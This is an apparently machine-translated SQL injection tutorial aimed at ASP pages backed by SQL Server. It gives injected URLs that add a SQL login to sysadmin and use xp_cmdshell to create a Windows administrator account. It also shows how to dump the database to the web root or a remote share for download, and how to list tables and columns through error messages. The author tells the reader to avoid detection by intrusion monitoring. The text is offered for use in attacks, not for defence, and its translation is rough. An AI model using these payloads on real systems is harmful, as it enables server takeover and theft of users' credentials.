Use SQL injection to get SQL administrative and system permissions through dbo

I did the following tests: (1) http://www.xxx.com/new/new.asp?id=49 '

Microsoft OLE DB Provider for ODBC Drivers error ' 80040e14
[Microsoft] [ODBC Microsoft Access Driver] string syntax error
In the query expression ' id=49 '.
/new.asp, Line 36

(2) http://www.xxx.com/new/new.asp?id=49 and 1=1
(Normal return page)

(3) http://www.xxx.com/new/new.asp?id=49 and 1=2
Microsoft OLE DB Provider for ODBC Drivers error ' 800A0BCD '
One of the BOF or EOF is "true", or the current record has been deleted, and the required operation requires a current record.
/new.asp, line 42

Note: The above test has been able to see the opportunity to inject SQL, we use the following sentence to determine his database type and login identity.
Http://www.xxx.com/new/new.asp?id=49 and User>0
Microsoft OLE DB Provider for ODBC Drivers error ' 800A0BCD '
syntax error converting nvarchar value ' dbo ' to columns with data type int
/new.asp, line 42
NOTE: If a syntax error occurs when displaying a column with the "dbo" conversion data type int, then you can use the method I described below to gain system administration privileges. If a syntax error occurs when "ABC" converts a column with a data type of int then use the following introduction to get the system permissions.

Once you have obtained the above information, you can submit the following URLs step-by-step to obtain SQL Administrator permissions and system permissions.

(1) http://www.xxx.com/new/new.asp?id=49;exec
Aster.dbo.sp_addlogin fmzm;--
Add SQL User

(2) http://www.xxx.com/new/new.asp?id=49;exec Master.dbo.sp_password null,fmzm,fmzm;--
Set the SQL account FMZM password is FMZM

(3) http://www.xxx.com/new/new.asp?id=49;exec Master.dbo.sp_addsrvrolemember sysadmin fmzm;--

Elevated privileges: Add FMZM to the sysadmin management group (sometimes unsuccessful, common sense, the following sentence
; exec master.dbo.sp_addsrvrolemember fmzm,sysadmin--Why is this so, I do not clear clearly, I met? Planted... ）

(4) http://www.xxx.com/new/new.asp?id=49;exec Master.dbo.xp_cmdshell ' net user fmzm fmzm/workstations:*/times:all/ Passwordchg:yes/passwordreq:yes/active:yes/add ';--
Set up a system with FMZM and set its password to FMZM
(Note:/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes These are key, if you do not add these, you build the user is very likely to be unable to login, these are enabled your account, And make the password never expire some related settings. ）

(5) Http://www.xxx.com/new/new.asp?id=49;exec Master.dbo.xp_cmdshell ' net localgroup Administrators Fmzm/add ';--

Add account FMZM to the Administrators group

OK, so far, you've got SQL admin rights and System privileges, what else can't you do? To change the above sentence into a telnet, or with a SQL connector to connect, whatever you do, remember not to expose yourself oh:) Now some good IDs have begun to monitor xp_cmdshell these keywords.

Attached: (1) http://Site/url.asp?id=1;; and db_name () >0

There is a similar example and user>0, which is to get the connection user name, Db_name () is another system variable, and returns the database name of the connection.

(2) Http://Site/url.asp?id=1;backup database name to disk= ' c:\inetpub\wwwroot\1.db ';--

This is quite a trick, from ③ to get the database name, plus some IIS error exposed the absolute path, the database back to the Web directory, and then the entire database with HTTP to complete the download back, all the admin and user password are glance! When you do not know the absolute path, you can also back up to the network address of the method (such as \\202.96.xx.xx\Share\1.db), but the success rate is not high.

(3) http://Site/url.asp?id=1;; and (Select top 1 name from sysobjects where xtype= ' U ' and status>0) >0

sysobjects is a SQL Server system table that stores all table names, views, constraints, and other objects, xtype= ' U ' and status>0, the name of the table that the user creates, and the above statement takes the first table name out and compares it to 0. Let the error message expose the table name. Second, the third table name how to get? Still can
Consider for yourself.

(4) http://Site/url.asp?id=1;; and (Select top 1 col_name (object_id (' table name '), 1) from sysobjects) >0

From (3) After getting the table name, use OBJECT_ID (' table name ') to get the table name corresponding to the internal id,col_name (table name id,1) represents the table's 1th field name, 1 to 2,3,4 ... you can get the name of the field in the Puzzle table one by one.